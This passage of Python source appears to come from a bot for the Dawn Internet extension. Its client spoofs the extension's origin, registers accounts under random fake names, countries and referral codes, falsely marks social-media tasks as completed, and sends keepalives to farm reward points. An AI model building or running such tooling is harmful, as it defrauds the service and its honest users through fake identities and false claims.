94 | url,
95 | headers=headers if headers else self.session.headers,
96 | cookies=cookies,
97 | )
98 | else:
99 | response = await self.session.get(
100 | url,
101 | params=params,
102 | headers=headers if headers else self.session.headers,
103 | cookies=cookies,
104 | )
105 |
106 | if verify:
107 | if response.status_code == 403 and "403 Forbidden" in response.text:
108 | raise ProxyForbidden(f"Proxy forbidden - {response.status_code}")
109 | elif response.status_code == 403:
110 | raise SessionRateLimited("Session is rate limited or blocked by Cloudflare")
111 |
112 | if response.status_code in (500, 502, 503, 504):
113 | raise ServerError(f"Server error - {response.status_code}")
114 |
115 | try:
116 | response_json = response.json()
117 | await self._verify_response(response_json)
118 | return response_json
119 | except json.JSONDecodeError:
120 | raise ServerError(f"Failed to decode response, most likely server error")
121 |
122 | return response.text
123 |
124 | except ServerError as error:
125 | if attempt == max_retries - 1:
126 | raise error
127 | await asyncio.sleep(retry_delay)
128 |
129 | except (APIError, SessionRateLimited, ProxyForbidden):
130 | raise
131 |
132 | except Exception as error:
133 | if attempt == max_retries - 1:
134 | raise ServerError(
135 | f"Failed to send request after {max_retries} attempts: {error}"
136 | )
137 | await asyncio.sleep(retry_delay)
138 |
139 | raise ServerError(f"Failed to send request after {max_retries} attempts")
140 |
141 |
142 | class DawnExtensionAPI(APIClient):
143 | def __init__(self, auth_token: str = None, proxy: str = None):
144 | super().__init__(proxy)
145 | self.auth_token = auth_token
146 |
147 | async def get_puzzle_id(self, app_id: str) -> str:
148 | headers = {
149 | 'user-agent': self.user_agent,
150 | 'accept': '*/*',
151 | 'origin': 'chrome-extension://fpdkjdnhkakefebpekbdhillbhonfjjp',
152 | 'accept-language': 'uk-UA,uk;q=0.9,en-US;q=0.8,en;q=0.7',
153 | 'host': 'ext-api.dawninternet.com',
154 | }
155 |
156 | response = await self.send_request(
157 | api_type="DASHBOARD",
158 | method="/v1/puzzle/get-puzzle",
159 | request_type="GET",
160 | params={"appid": app_id},
161 | headers=headers,
162 | )
163 | return response["puzzle_id"]
164 |
165 | async def get_puzzle_image(self, puzzle_id: str, app_id: str) -> str:
166 | headers = {
167 | 'user-agent': self.user_agent,
168 | 'accept': '*/*',
169 | 'origin': 'chrome-extension://fpdkjdnhkakefebpekbdhillbhonfjjp',
170 | 'accept-language': 'uk-UA,uk;q=0.9,en-US;q=0.8,en;q=0.7',
171 | 'host': 'ext-api.dawninternet.com',
172 | }
173 |
174 | response = await self.send_request(
175 | api_type="DASHBOARD",
176 | method="/v1/puzzle/get-puzzle-image",
177 | request_type="GET",
178 | params={"puzzle_id": puzzle_id, "appid": app_id},
179 | headers=headers,
180 | )
181 |
182 | return response.get("imgBase64")
183 |
184 |
185 | async def get_app_id(self) -> str:
186 | headers = {
187 | 'user-agent': self.user_agent,
188 | 'accept': '*/*',
189 | 'origin': 'chrome-extension://fpdkjdnhkakefebpekbdhillbhonfjjp',
190 | 'accept-language': 'uk-UA,uk;q=0.9,en-US;q=0.8,en;q=0.7',
191 | 'host': 'ext-api.dawninternet.com',
192 | }
193 |
194 | params = {
195 | 'app_v': '1.1.4',
196 | }
197 |
198 | response = await self.send_request(
199 | api_type="DASHBOARD",
200 | method="/v1/appid/getappid",
201 | request_type="GET",
202 | params=params,
203 | headers=headers,
204 | )
205 |
206 | return response["data"]["appid"]
207 |
208 | async def register(self, email: str, password: str, captcha_token: str, app_id: str) -> dict:
209 | headers = {
210 | 'user-agent': self.user_agent,
211 | 'accept': 'application/json, text/plain, */*',
212 | 'content-type': 'application/json',
213 | 'origin': 'https://dashboard.dawninternet.com',
214 | 'referer': 'https://dashboard.dawninternet.com/',
215 | 'accept-language': 'uk-UA,uk;q=0.9,en-US;q=0.8,en;q=0.7',
216 | 'accept-encoding': 'gzip, deflate, br'
217 | }
218 |
219 | json_data = {
220 | 'firstname': names.get_first_name(),
221 | 'lastname': names.get_last_name(),
222 | 'email': email,
223 | 'mobile': '',
224 | 'country': random.choice([
225 | 'AL', 'AD', 'AT', 'BY', 'BE', 'BA', 'BG', 'HR', 'CZ', 'DK',
226 | 'EE', 'FI', 'FR', 'DE', 'GR', 'HU', 'IS', 'IE', 'IT', 'LV',
227 | 'LI', 'LT', 'LU', 'MT', 'MD', 'MC', 'ME', 'NL', 'MK', 'NO',
228 | 'PL', 'PT', 'RO', 'RU', 'SM', 'RS', 'SK', 'SI', 'ES', 'SE',
229 |                 'CH', 'UA', 'GB', 'VA'
230 | ]),
231 | 'password': password,
232 | 'referralCode': random.choice(config.referral_codes) if config.referral_codes else "",
233 | 'token': captcha_token,
234 | 'isMarketing': False,
235 | 'browserName': 'chrome',
236 | }
237 |
238 | return await self.send_request(
239 | api_type="DASHBOARD",
240 | method="/v2/dashboard/user/validate-register",
241 | json_data=json_data,
242 | params={"appid": app_id},
243 | headers=headers,
244 | )
245 |
246 | @require_auth_token
247 | async def keepalive(self, email: str, app_id: str) -> dict | str:
248 | headers = {
249 | 'user-agent': self.user_agent,
250 | 'content-type': 'application/json',
251 | 'authorization': f'Berear {self.auth_token}',
252 | 'accept': '*/*',
253 | 'origin': 'chrome-extension://fpdkjdnhkakefebpekbdhillbhonfjjp',
254 | 'accept-language': 'uk-UA,uk;q=0.9,en-US;q=0.8,en;q=0.7',
255 | 'accept-encoding': 'gzip, deflate, br'
256 | }
257 |
258 | json_data = {
259 | "username": email,
260 | "extensionid": "fpdkjdnhkakefebpekbdhillbhonfjjp",
261 | "numberoftabs": 0,
262 | "_v": "1.1.4",
263 | }
264 |
265 | return await self.send_request(
266 | method="/v1/userreward/keepalive",
267 | json_data=json_data,
268 | verify=False,
269 | headers=headers,
270 | params={"appid": app_id},
271 | )
272 |
273 | @require_auth_token
274 | async def user_info(self, app_id: str) -> dict:
275 | headers = {
276 | 'authorization': f'Berear {self.auth_token}',
277 | 'user-agent': self.user_agent,
278 | 'content-type': 'application/json',
279 | 'accept': '*/*',
280 | 'origin': 'chrome-extension://fpdkjdnhkakefebpekbdhillbhonfjjp',
281 | 'accept-language': 'uk-UA,uk;q=0.9,en-US;q=0.8,en;q=0.7',
282 | 'accept-encoding': 'gzip, deflate, br'
283 | }
284 |
285 | response = await self.send_request(
286 | url="https://www.aeropres.in/api/atom/v1/userreferral/getpoint",
287 | request_type="GET",
288 | headers=headers,
289 | params={"appid": app_id},
290 | )
291 |
292 | return response["data"]
293 |
294 | async def verify_registration(self, key: str, captcha_token: str) -> dict:
295 | headers = {
296 | 'user-agent': self.user_agent,
297 | 'content-type': 'application/json',
298 | 'accept': '*/*',
299 | 'origin': 'https://verify.dawninternet.com',
300 | 'accept-language': 'uk-UA,uk;q=0.9,en-US;q=0.8,en;q=0.7',
301 | 'accept-encoding': 'gzip, deflate, br'
302 | }
303 |
304 | return await self.send_request(
305 | url='https://verify.dawninternet.com/chromeapi/dawn/v1/userverify/verifycheck',
306 | json_data={"token": captcha_token},
307 | headers=headers,
308 | params={"key": key},
309 | )
310 |
311 | async def resend_verify_link(self, email: str, puzzle_id: str, answer: str, app_id: str) -> dict:
312 | headers = {
313 | 'accept': '*/*',
314 | 'accept-language': 'en-US,en;q=0.9,ru;q=0.8',
315 | 'content-type': 'application/json',
316 | 'origin': 'chrome-extension://fpdkjdnhkakefebpekbdhillbhonfjjp',
317 | 'user-agent': self.user_agent,
318 | }
319 |
320 | json_data = {
321 | 'username': email,
322 | 'puzzle_id': puzzle_id,
323 | 'ans': answer,
324 | }
325 |
326 | return await self.send_request(
327 | method="/v1/user/resendverifylink/v2",
328 | json_data=json_data,
329 | params={"appid": app_id},
330 | headers=headers,
331 | )
332 |
333 | @require_auth_token
334 | async def complete_tasks(self, app_id: str, tasks: list[str] = None, delay: int = 1) -> None:
335 | if not tasks:
336 | tasks = ["telegramid", "discordid", "twitter_x_id"]
337 |
338 | headers = {
339 | 'authorization': f'Brearer {self.auth_token}',
340 | 'user-agent': self.user_agent,
341 | 'content-type': 'application/json',
342 | 'accept': '*/*',
343 | 'origin': 'chrome-extension://fpdkjdnhkakefebpekbdhillbhonfjjp',
344 | 'accept-language': 'uk-UA,uk;q=0.9,en-US;q=0.8,en;q=0.7',
345 | 'accept-encoding': 'gzip, deflate, br'
346 | }
347 |
348 | for task in tasks:
349 | await self.send_request(
350 | method="/v1/profile/update",
351 | json_data={task: task},
352 | headers=headers,
353 | params={"appid": app_id},
354 | )
355 |
356 |             await asyncio.sleep(delay)  # pause between profile updates
357 |
358 |     async def verify_session(self, app_id: str) -> tuple[bool, str]:
359 |         try:
360 |             await self.user_info(app_id)
361 | return True, "Session is valid"
362 |
363 | except ServerError:
364 | return True, "Server error"
365 |
366 | except APIError as error:
367 | return False, str(error)
368 |
369 | async def login(self, email: str, password: str, puzzle_id: str, answer: str, app_id: str) -> str:
370 | headers = {
371 | 'user-agent': self.user_agent,
372 | 'content-type': 'application/json',
373 | 'accept': '*/*',
374 | 'origin': 'chrome-extension://fpdkjdnhkakefebpekbdhillbhonfjjp',
375 | 'accept-language': 'uk-UA,uk;q=0.9,en-US;q=0.8,en;q=0.7',
376 | 'accept-encoding': 'gzip, deflate, br'
377 | }
378 |
379 | current_time = datetime.now(timezone.utc)
380 | formatted_datetime_str = (
381 | current_time.strftime("%Y-%m-%dT%H:%M:%S.%f")[:-3] + "Z"
382 | )
383 |
384 | json_data = {
385 | "username": email,
386 | "password": password,
387 | "logindata": {
388 | '_v': {
389 | 'version': '1.1.4',
390 | },
391 | 'datetime': formatted_datetime_str,
392 | },
393 | "puzzle_id": puzzle_id,
394 | "ans": answer,
395 | "appid": app_id,
396 | }
397 |
398 | response = await self.send_request(
399 | method="/v1/user/login/v2",
400 | json_data=json_data,
401 | params={"appid": app_id},
402 | headers=headers,
403 | )
404 |
405 | bearer = response.get("data", {}).get("token")
406 | if bearer:
407 | return bearer
408 | else:
409 | raise APIError(f"Failed to login: {response}")
410 |
--------------------------------------------------------------------------------